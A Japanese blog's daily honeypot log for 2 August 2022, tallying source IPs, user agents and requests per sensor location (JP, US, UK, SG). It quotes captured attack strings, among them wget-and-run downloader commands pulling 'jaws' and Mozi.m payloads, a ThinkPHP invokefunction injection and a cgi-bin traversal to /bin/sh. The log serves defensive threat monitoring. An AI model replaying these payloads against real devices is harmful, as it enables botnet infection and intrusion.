2022/08/02 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/08/02分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

curlによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  rischyo.cf/jaws;
sh /tmp/jaws

Location:US

D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
Gh0stRATのような動き

を確認しました。

Location:UK

D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
/.awsへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:SG

D-link製品の脆弱性を狙うアクセス
/.awsへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：226 (前日比：139)
US：総アクセス数：80 (前日比：3)
UK：総アクセス数：43 (前日比：-15)
SG：総アクセス数：70 (前日比：5)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.38.2.237	United States
4	23.225.163.211	United States
127	35.90.54.60	United States
1	45.148.10.81	Romania
1	45.153.241.153	Germany
2	52.207.183.2	United States
1	54.153.76.79	United States
1	69.162.231.221	United States
15	95.214.235.205	Ukraine
22	104.156.155.29	United States
2	109.237.103.9	Russia
2	109.237.103.123	Russia
1	120.244.202.83	China
8	135.125.217.54	France
7	135.125.246.189	France
4	141.98.6.62	Bulgaria
1	143.198.97.178	United States
1	163.123.143.71	United States
8	171.22.30.52	Bulgaria
2	179.43.155.171	Panama
10	185.7.214.104	Hong Kong
1	185.100.87.136	Seychelles
1	192.241.220.209	United States
1	192.241.221.11	United States
1	198.235.24.10	United States
1	203.122.46.146	India

UserAgent一覧

件数	UserAgent
15	`-`
4	`Go-http-client/1.1`
6	`Mozila/5.0`
4	`Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36`
37	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 zgrab/0.x`
11	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
15	`curl/7.54.0`
118	`python-requests/2.28.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_18.179.20.5_80\n`
2		`\x16\x03\x01\x01D\x01`
6		`\x16\x03\x01\x02`
3		`\x16\x03\x01`
1	CONNECT	`kyfw[.]12306[.]cn:443`	HTTP/1.0
1	GET	`/.env.bak`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
38	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`//.aws/credentials`	HTTP/1.1
1	GET	`//.env.bak`	HTTP/1.1
1	GET	`//.git/config`	HTTP/1.1
1	GET	`//_profiler/phpinfo/info.php`	HTTP/1.1
1	GET	`//_profiler/phpinfo/phpinfo.php`	HTTP/1.1
1	GET	`//_profiler/phpinfo`	HTTP/1.1
1	GET	`//`	HTTP/1.1
1	GET	`//access/info.php`	HTTP/1.1
1	GET	`//access/infophp.php`	HTTP/1.1
1	GET	`//access/phpinfo.php`	HTTP/1.1
1	GET	`//access/phpinfo`	HTTP/1.1
1	GET	`//account/info.php`	HTTP/1.1
1	GET	`//account/infophp.php`	HTTP/1.1
1	GET	`//account/phpinfo.php`	HTTP/1.1
1	GET	`//account/phpinfo`	HTTP/1.1
1	GET	`//admin/info.php`	HTTP/1.1
1	GET	`//admin/infophp.php`	HTTP/1.1
1	GET	`//admin/phpinfo.html`	HTTP/1.1
1	GET	`//admin/phpinfo.php`	HTTP/1.1
1	GET	`//admin/phpinfo`	HTTP/1.1
1	GET	`//admin_php[.]php/infophp.php`	HTTP/1.1
1	GET	`//apache/i.php`	HTTP/1.1
1	GET	`//apache/info.php`	HTTP/1.1
1	GET	`//apache/phpinfo.php`	HTTP/1.1
1	GET	`//apache2[.]php`	HTTP/1.1
1	GET	`//apache[.]php`	HTTP/1.1
1	GET	`//aws[.]yml`	HTTP/1.1
1	GET	`//backend/.env`	HTTP/1.1
1	GET	`//config[.]js`	HTTP/1.1
1	GET	`//console/info.php`	HTTP/1.1
1	GET	`//console/infophp`	HTTP/1.1
1	GET	`//console/phpinfo.html`	HTTP/1.1
1	GET	`//console/phpinfo.php`	HTTP/1.1
1	GET	`//console/phpinfo`	HTTP/1.1
1	GET	`//dashboard/i.php`	HTTP/1.1
1	GET	`//dashboard/info.php`	HTTP/1.1
1	GET	`//dashboard/infophp.php`	HTTP/1.1
2	GET	`//dashboard/phpinfo.php`	HTTP/1.1
1	GET	`//dashboard/phpinfo`	HTTP/1.1
1	GET	`//dashboard/test.php`	HTTP/1.1
1	GET	`//debug/default/view?panel=config`	HTTP/1.1
1	GET	`//dep[.]php`	HTTP/1.1
1	GET	`//deploy[.]php`	HTTP/1.1
1	GET	`//dev/.env`	HTTP/1.1
2	GET	`//dev[.]php`	HTTP/1.1
1	GET	`//developer[.]php`	HTTP/1.1
1	GET	`//devs[.]php`	HTTP/1.1
1	GET	`//env/info.php`	HTTP/1.1
1	GET	`//env/infophp`	HTTP/1.1
1	GET	`//env/phpinfo.php`	HTTP/1.1
1	GET	`//env/phpinfo`	HTTP/1.1
1	GET	`//environment/info.php`	HTTP/1.1
1	GET	`//environment/infophp.php`	HTTP/1.1
1	GET	`//environment/phpinfo.php`	HTTP/1.1
1	GET	`//environment/phpinfo`	HTTP/1.1
1	GET	`//frontend_dev[.]php/$`	HTTP/1.1
1	GET	`//i[.]php`	HTTP/1.1
1	GET	`//in[.]php`	HTTP/1.1
1	GET	`//index/info.php`	HTTP/1.1
1	GET	`//index/infophp.php`	HTTP/1.1
1	GET	`//index/phpinfo.php`	HTTP/1.1
1	GET	`//index/phpinfo`	HTTP/1.1
1	GET	`//index1[.]php`	HTTP/1.1
1	GET	`//index[.]php`	HTTP/1.1
1	GET	`//inf[.]php`	HTTP/1.1
1	GET	`//info/info.php`	HTTP/1.1
1	GET	`//info/infophp.php`	HTTP/1.1
1	GET	`//info/phpinfo.php`	HTTP/1.1
1	GET	`//info/phpinfo`	HTTP/1.1
1	GET	`//info1[.]php`	HTTP/1.1
1	GET	`//info2[.]php`	HTTP/1.1
1	GET	`//info3[.]php`	HTTP/1.1
1	GET	`//info4[.]php`	HTTP/1.1
2	GET	`//info[.]php`	HTTP/1.1
1	GET	`//infophp[.]php`	HTTP/1.1
1	GET	`//infos[.]php`	HTTP/1.1
1	GET	`//ini[.]php`	HTTP/1.1
1	GET	`//live/.env`	HTTP/1.1
1	GET	`//o[.]php`	HTTP/1.1
1	GET	`//ocp[.]php`	HTTP/1.1
1	GET	`//p[.]php`	HTTP/1.1
1	GET	`//php-info.php`	HTTP/1.1
1	GET	`//php/phpinfo.php`	HTTP/1.1
1	GET	`//php1[.]php`	HTTP/1.1
1	GET	`//php[.]php`	HTTP/1.1
1	GET	`//php_info[.]php`	HTTP/1.1
1	GET	`//phpinfo/info.php`	HTTP/1.1
1	GET	`//phpinfo/phpinfo.php`	HTTP/1.1
1	GET	`//phpinfo1[.]php`	HTTP/1.1
1	GET	`//phpinfo2[.]php`	HTTP/1.1
1	GET	`//phpinfo3[.]php`	HTTP/1.1
1	GET	`//phpinfo4[.]php`	HTTP/1.1
2	GET	`//phpinfo[.]html`	HTTP/1.1
2	GET	`//phpinfo[.]php`	HTTP/1.1
1	GET	`//phpinfo[.]txt`	HTTP/1.1
1	GET	`//phpinfo`	HTTP/1.1
1	GET	`//phpinfodev[.]php`	HTTP/1.1
1	GET	`//phpinfos[.]php`	HTTP/1.1
1	GET	`//phpsysinfo/info.php`	HTTP/1.1
1	GET	`//phpsysinfo/phpinfo.php`	HTTP/1.1
1	GET	`//phpsysinfo/phpsysinfo.php`	HTTP/1.1
1	GET	`//phpsysinfo[.]php`	HTTP/1.1
1	GET	`//phpsysinfo`	HTTP/1.1
1	GET	`//phptest[.]php`	HTTP/1.1
1	GET	`//pinfo[.]php`	HTTP/1.1
1	GET	`//rest[.]php`	HTTP/1.1
1	GET	`//root/info.php`	HTTP/1.1
1	GET	`//root/infophp.php`	HTTP/1.1
1	GET	`//root/phpinfo.html`	HTTP/1.1
1	GET	`//root/phpinfo.php`	HTTP/1.1
1	GET	`//root/phpinfo`	HTTP/1.1
1	GET	`//staging/.env`	HTTP/1.1
1	GET	`//test0[.]php`	HTTP/1.1
1	GET	`//test1[.]php`	HTTP/1.1
1	GET	`//test1`	HTTP/1.1
1	GET	`//test2[.]php`	HTTP/1.1
1	GET	`//test3[.]php`	HTTP/1.1
1	GET	`//test4[.]php`	HTTP/1.1
1	GET	`//test[.]php`	HTTP/1.1
1	GET	`//token[.]php`	HTTP/1.1
1	GET	`//tools/info.php`	HTTP/1.1
1	GET	`//tools/infophp.php`	HTTP/1.1
1	GET	`//tools/phpinfo.php`	HTTP/1.1
1	GET	`//tools/phpinfo`	HTTP/1.1
1	GET	`//tz[.]php`	HTTP/1.1
1	GET	`//web[.]php`	HTTP/1.1
1	GET	`/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?pp=env`	HTTP/1.1
1	GET	`/CSS/Miniweb.css`	HTTP/1.1
1	GET	`/JUVg`	HTTP/1.1
1	GET	`/Portal/Portal.mwsl`	HTTP/1.1
1	GET	`/Portal0000.htm`	HTTP/1.1
1	GET	`/__Additional`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/localstart.jsa`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/nmaplowercheck1659295252`	HTTP/1.1
1	GET	`/pools/default/buckets`	HTTP/1.1
1	GET	`/pools`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ rischyo.cf/jaws;sh+/tmp/jaws`
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//example[.]com/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/scripts/WPnBr.dll`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	38.68.52.126	United States
2	45.227.254.48	Belize
10	51.79.29.48	Canada
1	54.151.107.142	United States
1	66.240.205.34	United States
1	77.83.36.40	Ukraine
1	89.45.4.150	Romania
1	103.41.24.100	India
2	109.237.103.9	Russia
2	109.237.103.38	Russia
2	109.237.103.123	Russia
1	116.27.212.175	China
1	137.184.33.230	United States
2	141.98.6.62	Bulgaria
1	141.98.6.162	Bulgaria
1	143.198.97.178	United States
1	147.182.255.203	United States
1	150.136.32.247	United States
1	162.142.125.10	United States
1	162.142.125.221	United States
2	163.123.143.71	United States
1	164.92.85.208	United States
1	167.94.138.117	United States
1	167.248.133.45	United States
1	167.248.133.117	United States
1	171.22.30.42	Bulgaria
1	172.104.242.173	United States
2	179.43.154.206	Panama
16	185.7.214.104	Hong Kong
4	185.23.182.110	Hong Kong
1	185.44.76.187	United Kingdom
9	185.254.196.223	Ukraine
1	192.241.220.189	United States
4	198.20.87.98	United States
1	198.199.95.17	United States

UserAgent一覧

件数	UserAgent
19	`-`
3	`Go-http-client/1.1`
1	`Mozila/5.0`
2	`Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8`
16	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1`
29	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`Gh0st\xad`
2		`\x03`
1		`\x16\x03\x01\x01C\x01`
2		`\x16\x03\x01\x01D\x01`
2		`\x16\x03\x01`
29	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`//prototype/.env`	HTTP/1.1
1	GET	`//staging/.env`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
2	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
2	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/HNAP1/`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
2	GET	`/sitemap.xml`	HTTP/1.1
2	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
2	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//dyn[.]epicgifs[.]net/test6956.php`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
2	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
5	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.226.59.136	United States
4	27.124.32.177	Singapore
1	35.82.32.181	United States
1	66.240.192.82	United States
2	94.23.14.201	France
1	107.182.129.137	United States
2	109.237.103.9	Russia
2	109.237.103.38	Russia
2	109.237.103.118	Russia
2	109.237.103.123	Russia
1	114.228.35.186	China
1	141.98.6.162	Bulgaria
1	141.145.199.222	United States
2	163.123.143.71	United States
1	164.92.113.92	United States
1	167.94.146.57	United States
1	172.104.242.173	United States
1	178.60.27.186	Spain
9	185.7.214.104	Hong Kong
1	192.241.213.50	United States
1	192.241.214.12	United States
1	192.241.214.208	United States
1	192.241.219.54	United States
2	194.165.16.76	Panama
1	205.210.31.22	United States

UserAgent一覧

件数	UserAgent
16	`-`
3	`Go-http-client/1.1`
1	`Mozila/5.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
6	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
3	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
2		`\x03`
1		`\x16\x03\x01\x01C\x01`
3		`\x16\x03\x01\x01D\x01`
4		`\x16\x03\x01`
1	GET	`/.aws/credentials`	HTTP/1.1
6	GET	`/.env`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/phpMyAdmin/index.php`	HTTP/1.1
1	GET	`/phpmyadmin/index.php`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//114[.]228[.]35[.]186:51669/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	13.52.217.137	United States
4	23.224.186.230	United States
1	34.207.127.1	United States
1	45.148.10.81	Romania
10	51.79.29.48	Canada
1	69.162.231.221	United States
2	94.23.14.201	France
2	107.172.100.220	United States
1	107.182.129.137	United States
2	109.237.103.9	Russia
2	109.237.103.118	Russia
1	120.244.202.83	China
3	128.199.83.90	United Kingdom
2	138.197.183.239	United States
4	141.98.6.62	Bulgaria
1	141.98.6.162	Bulgaria
3	163.123.143.71	United States
1	167.94.138.119	United States
1	172.104.242.173	United States
1	172.105.77.209	United States
1	172.105.89.161	United States
10	185.7.214.104	Hong Kong
8	185.254.196.223	Ukraine
1	192.241.201.89	United States
1	192.241.206.57	United States
1	192.241.222.172	United States
2	194.165.16.37	Panama
1	200.110.48.18	Bolivia
1	205.210.31.32	United States

UserAgent一覧

件数	UserAgent
17	`-`
4	`Go-http-client/1.1`
1	`Mozila/5.0`
4	`Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36`
1	`Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
23	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_13.67.44.234_80`
2		`\x03`
2		`\x16\x03\x01\x01D\x01`
4		`\x16\x03\x01`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1	CONNECT	`kyfw[.]12306[.]cn:443`	HTTP/1.0
1	GET	`/.aws/credentials`	HTTP/1.1
20	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`//backend/.env`	HTTP/1.1
1	GET	`//dev/.env`	HTTP/1.1
1	GET	`//live/.env`	HTTP/1.1
1	GET	`//staging/.env`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/blog/.env`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/console/`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/phpMyAdmin/index.php`	HTTP/1.1
2	GET	`/phpmyadmin/index.php`	HTTP/1.1
1	GET	`/phpmyadmin4.8.5/index.php`	HTTP/1.1
1	GET	`/pmd/index.php`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//example[.]com/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
4	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0